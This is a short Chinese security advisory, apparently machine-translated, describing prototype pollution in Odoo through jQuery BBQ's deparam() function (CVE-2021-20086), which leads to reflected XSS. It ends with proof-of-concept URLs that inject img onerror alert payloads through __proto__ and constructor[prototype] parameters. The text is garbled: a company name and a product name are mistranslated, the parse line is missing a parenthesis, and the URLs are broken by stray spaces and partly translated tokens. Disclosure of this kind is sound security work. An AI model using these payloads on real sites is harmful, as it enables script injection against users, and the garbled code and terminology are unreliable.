跨站点脚本在Odoo应用程序通过原型污染

站得住脚的研究员发现原型污染脆弱性Odoo应用从而导致反映跨站点脚本(XSS)在受影响的应用程序。因为Odoo存在安全漏洞利用JQuery的脆弱的版本大后退按钮(JQuery烧烤),影响cve - 2021 - 20086,这可能导致污染的原型deparam ()函数。攻击者谁说服受害者访问一个特别制作的链接可以实现任意javascript在用户的浏览器中执行。

的概念:

在一个页面使用受到影响deparam ()unsanitized用户输入函数,反映了XSS载荷可以触发。例如:考虑一个页面解析url参数如下所示:

查询= $ .deparam (window.location.search.slice (1);

后两个url将引发refleced XSS警告框包含odoo-app域名:

# PoC固定在补丁https:// [odoo-app] / affected_page ? __proto__ % 5 bcontext % 5 d = % 3 cimg % 2 fsrc % 2 fonerror % 3 dalert % 28文档。域% 29% 3 e&__proto__ % 5 bjquery % 5 d = x #方法固定在最后的补丁https:// [odoo-app] / affected_page ?构造函数% 5 bprototype % 5 d % 5 bcontext % 5 d = % 3 cimg + src % 3 dx + onerror % 3 dalert % 28 document.domain % 29% 3 e&constructor % 5 bprototype % 5 d % 5 bjquery % 5 d = x